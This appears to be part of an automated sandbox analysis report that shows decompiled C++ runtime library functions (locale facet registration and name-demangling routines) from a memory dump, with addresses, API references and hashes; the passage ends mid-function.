Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (kTm
API String ID: 1394824916-3985963449
Opcode ID: 0d33d02941780335d9b99bf0e3768e6e3eb58aa5cbbb9ea31071595c6d58318c
Instruction ID: e92bad2d6b6568bd2e3cf2e62f7e587d203b9640376d8a479657d1125a408ab3
Opcode Fuzzy Hash: 0d33d02941780335d9b99bf0e3768e6e3eb58aa5cbbb9ea31071595c6d58318c
Instruction Fuzzy Hash: 9911E0758082299BCF05EBA0C840FEEBBB5AF94315F2A400CD611BB392CB74ED0087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t178 =  *0x6d546cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6D46161C(0x6d546b38);
				_t133 = _a8;
				_t64 = E6D46171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438( &_v32);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t173, _t178, 0x14);
							E6D486653( &_v20, 0);
							_t179 =  *0x6d546ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6D46161C(0x6d546cb8);
							_t140 = _a8;
							_t174 = E6D46171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6D4866BA( &_v20);
								return E6D4A0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D48AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438( &_v32);
										E6D4A3D74( &_v32, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t130, _t174, _t179, 0x14);
										E6D486653( &_v20, 0);
										_t180 =  *0x6d546cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6D46161C(0x6d546cbc);
										_t147 = _a8;
										_t175 = E6D46171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6D4866BA( &_v20);
											return E6D4A0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6D48AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438( &_v32);
													E6D4A3D74( &_v32, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t130, _t175, _t180, 0x14);
													E6D486653( &_v20, 0);
													_t181 =  *0x6d546cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6D46161C(0x6d546cc0);
													_t154 = _a8;
													_t176 = E6D46171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6D4866BA( &_v20);
														return E6D4A0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6D48AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6D461438(_t158);
																E6D4A3D74( &_v32, 0x6d543504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6d4eba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6D486FD3(__eflags, _t176);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6d546cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6D486FD3(__eflags, _t175);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6d546cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6D486FD3(__eflags, _t174);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6d546ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6D486FD3(__eflags, _t173);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6d546cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

0x6d48a0ff
0x6d48a0ff
0x6d48a106
0x6d48a110
0x6d48a115
0x6d48a120
0x6d48a124
0x6d48a127
0x6d48a12c
0x6d48a130
0x6d48a135
0x6d48a139
0x6d48a17e
0x6d48a181
0x6d48a18d
0x6d48a13b
0x6d48a13d
0x6d48a143
0x6d48a149
0x6d48a151
0x6d48a154
0x6d48a191
0x6d48a19f
0x6d48a1a4
0x6d48a1ac
0x6d48a1b6
0x6d48a1bb
0x6d48a1c6
0x6d48a1ca
0x6d48a1cd
0x6d48a1d2
0x6d48a1db
0x6d48a1dd
0x6d48a1df
0x6d48a224
0x6d48a227
0x6d48a233
0x6d48a1e1
0x6d48a1e1
0x6d48a1e3
0x6d48a1e9
0x6d48a1ef
0x6d48a1f7
0x6d48a1fa
0x6d48a237
0x6d48a245
0x6d48a24a
0x6d48a252
0x6d48a25c
0x6d48a261
0x6d48a26c
0x6d48a270
0x6d48a273
0x6d48a278
0x6d48a281
0x6d48a283
0x6d48a285
0x6d48a2ca
0x6d48a2cd
0x6d48a2d9
0x6d48a287
0x6d48a287
0x6d48a289
0x6d48a28f
0x6d48a295
0x6d48a29d
0x6d48a2a0
0x6d48a2dd
0x6d48a2eb
0x6d48a2f0
0x6d48a2f8
0x6d48a302
0x6d48a307
0x6d48a312
0x6d48a316
0x6d48a319
0x6d48a31e
0x6d48a327
0x6d48a329
0x6d48a32b
0x6d48a370
0x6d48a373
0x6d48a37f
0x6d48a32d
0x6d48a32d
0x6d48a32f
0x6d48a335
0x6d48a33b
0x6d48a343
0x6d48a346
0x6d48a380
0x6d48a383
0x6d48a391
0x6d48a396
0x6d48a39a
0x6d48a39e
0x6d48a3a3
0x6d48a3a6
0x6d48a3ad
0x6d48a348
0x6d48a348
0x6d48a34b
0x6d48a34f
0x6d48a353
0x6d48a360
0x6d48a368
0x6d48a36a
0x00000000
0x6d48a36a
0x6d48a331
0x6d48a331
0x00000000
0x6d48a331
0x6d48a32f
0x6d48a2a2
0x6d48a2a2
0x6d48a2a5
0x6d48a2a9
0x6d48a2ad
0x6d48a2ba
0x6d48a2c2
0x6d48a2c4
0x00000000
0x6d48a2c4
0x6d48a28b
0x6d48a28b
0x00000000
0x6d48a28b
0x6d48a289
0x6d48a1fc
0x6d48a1fc
0x6d48a1ff
0x6d48a203
0x6d48a207
0x6d48a214
0x6d48a21c
0x6d48a21e
0x00000000
0x6d48a21e
0x6d48a1e5
0x6d48a1e5
0x00000000
0x6d48a1e5
0x6d48a1e3
0x6d48a156
0x6d48a156
0x6d48a159
0x6d48a15d
0x6d48a161
0x6d48a16e
0x6d48a176
0x6d48a178
0x00000000
0x6d48a178
0x6d48a13f
0x6d48a13f
0x00000000
0x6d48a13f
0x6d48a13d

APIs

__EH_prolog3.LIBCMT ref: 6D48A106
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A110
int.LIBCPMT ref: 6D48A127

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

ctype.LIBCPMT ref: 6D48A14A
std::_Facet_Register.LIBCPMT ref: 6D48A161
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A181
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A19F

Strings

8kTm, xrefs: 6D48A11B

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8kTm
API String ID: 1394824916-3180178982
Opcode ID: 9e949b17c694e80ecd5b4b8aae4975990f00f128cf10934b2c09acc2cc38fecb
Instruction ID: 8843d63abd8b53b2ece52169233878849d5d558bf860ab68422f048030327f48
Opcode Fuzzy Hash: 9e949b17c694e80ecd5b4b8aae4975990f00f128cf10934b2c09acc2cc38fecb
Instruction Fuzzy Hash: E611CE758082199BCF01EBA4C841EEDB7B5AF90355F2A400CD611A73D5DFB4DE0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A735D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4A735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6D4A5A6C( &_v12, E6D4A614D(0));
				_t33 =  *0x6d547218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6D4A6052( &_v12, 1);
					goto L8;
				} else {
					 *0x6d547218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6D4A5FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6D4A5EFB( &_v12, E6D4A9DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6D4A5FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}

0x6d4a736f
0x6d4a7374
0x6d4a737a
0x6d4a737e
0x6d4a73d3
0x00000000
0x6d4a7380
0x6d4a7384
0x6d4a738a
0x6d4a738d
0x6d4a73c7
0x00000000
0x6d4a738f
0x6d4a7390
0x6d4a7393
0x6d4a73b8
0x00000000
0x6d4a7395
0x6d4a7398
0x6d4a73d8
0x6d4a73e0
0x6d4a73e5
0x6d4a73eb
0x6d4a73f0
0x6d4a73f4
0x6d4a739a
0x6d4a739a
0x6d4a739d
0x6d4a73a1
0x6d4a73a4
0x6d4a73a9
0x6d4a73a9
0x6d4a7398
0x6d4a7393
0x6d4a738d

APIs

UnDecorator::UScore.LIBVCRUNTIME ref: 6D4A7365
DName::DName.LIBVCRUNTIME ref: 6D4A736F

Part of subcall function 6D4A5A6C: DName::doPchar.LIBVCRUNTIME ref: 6D4A5A93

UnDecorator::getScopedName.LIBVCRUNTIME ref: 6D4A73AE
DName::operator+=.LIBVCRUNTIME ref: 6D4A73B8
DName::operator+=.LIBCMT ref: 6D4A73C7
DName::operator+=.LIBCMT ref: 6D4A73D3
DName::operator+=.LIBCMT ref: 6D4A73E0

Strings

void, xrefs: 6D4A73BF

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 844413a5eda8532a707555e99088371fae25cc64d1de06819478ec1beb01208f
Instruction ID: 6b19afc7dc6de8c9c3d751b8ca9722114b6000cd34579f43745bde6ffaac4d05
Opcode Fuzzy Hash: 844413a5eda8532a707555e99088371fae25cc64d1de06819478ec1beb01208f
Instruction Fuzzy Hash: 45118E31908244AFCB04DF68C554FBDBB74AB21308F5A849CE9019B6DADBB0AE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t770 - 0x14, 0);
				_t735 =  *0x6d546db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6D46161C(0x6d546d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6D4866BA(_t770 - 0x14);
					return E6D4A0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6D490F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t770 - 0x20);
							E6D4A3D74(_t770 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t717, _t735, 0x14);
							E6D486653(_t770 - 0x14, 0);
							_t736 =  *0x6d546dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6D46161C(0x6d546d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6D4866BA(_t770 - 0x14);
								return E6D4A0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6D490F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t770 - 0x20);
										E6D4A3D74(_t770 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t544, _t718, _t736, 0x14);
										E6D486653(_t770 - 0x14, 0);
										_t737 =  *0x6d546dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6D46161C(0x6d546d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6D4866BA(_t770 - 0x14);
											return E6D4A0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6D490FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t770 - 0x20);
													E6D4A3D74(_t770 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t544, _t719, _t737, 0x14);
													E6D486653(_t770 - 0x14, 0);
													_t738 =  *0x6d546df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6D46161C(0x6d546d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6D4866BA(_t770 - 0x14);
														return E6D4A0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6D491057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t770 - 0x20);
																E6D4A3D74(_t770 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t544, _t720, _t738, 0x14);
																E6D486653(_t770 - 0x14, 0);
																_t739 =  *0x6d546dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6D46161C(0x6d546d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6D4866BA(_t770 - 0x14);
																	return E6D4A0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6D4910BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t770 - 0x20);
																			E6D4A3D74(_t770 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t544, _t721, _t739, 0x14);
																			E6D486653(_t770 - 0x14, 0);
																			_t740 =  *0x6d546df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6D46161C(0x6d546da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6D4866BA(_t770 - 0x14);
																				return E6D4A0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6D491127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t770 - 0x20);
																						E6D4A3D74(_t770 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t544, _t722, _t740, 0x14);
																						E6D486653(_t770 - 0x14, 0);
																						_t741 =  *0x6d546df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6D46161C(0x6d546da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6D4866BA(_t770 - 0x14);
																							return E6D4A0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6D4911AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t770 - 0x20);
																									E6D4A3D74(_t770 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t544, _t723, _t741, 0x14);
																									E6D486653(_t770 - 0x14, 0);
																									_t742 =  *0x6d546dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6D46161C(0x6d546d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6D4866BA(_t770 - 0x14);
																										return E6D4A0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6D491230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t770 - 0x20);
																												E6D4A3D74(_t770 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t544, _t724, _t742, 0x14);
																												E6D486653(_t770 - 0x14, 0);
																												_t743 =  *0x6d546dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6D46161C(0x6d546d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6D4866BA(_t770 - 0x14);
																													return E6D4A0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6D4912B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t770 - 0x20);
																															E6D4A3D74(_t770 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t544, _t725, _t743, 0x14);
																															E6D486653(_t770 - 0x14, 0);
																															_t744 =  *0x6d546dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6D46161C(0x6d546d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6D4866BA(_t770 - 0x14);
																																return E6D4A0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6D491339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t770 - 0x20);
																																		E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t544, _t726, _t744, 0x14);
																																		E6D486653(_t770 - 0x14, 0);
																																		_t745 =  *0x6d546db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6D46161C(0x6d546d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6D4866BA(_t770 - 0x14);
																																			return E6D4A0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6D4913A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t770 - 0x20);
																																					E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t544, _t727, _t745, 0x14);
																																					E6D486653(_t770 - 0x14, 0);
																																					_t746 =  *0x6d546ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6D46161C(0x6d546d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6D4866BA(_t770 - 0x14);
																																						return E6D4A0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6D491409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t770 - 0x20);
																																								E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t544, _t728, _t746, 0x14);
																																								E6D486653(_t770 - 0x14, 0);
																																								_t747 =  *0x6d546de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6D46161C(0x6d546d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6D4866BA(_t770 - 0x14);
																																									return E6D4A0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6D491471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t770 - 0x20);
																																											E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t544, _t729, _t747, 0x14);
																																											E6D486653(_t770 - 0x14, 0);
																																											_t748 =  *0x6d546dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6D46161C(0x6d546da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6D4866BA(_t770 - 0x14);
																																												return E6D4A0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6D4914EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t770 - 0x20);
																																														E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t544, _t730, _t748, 0x14);
																																														E6D486653(_t770 - 0x14, 0);
																																														_t749 =  *0x6d546dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6D46161C(0x6d546d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6D4866BA(_t770 - 0x14);
																																															return E6D4A0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6D491558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t770 - 0x20);
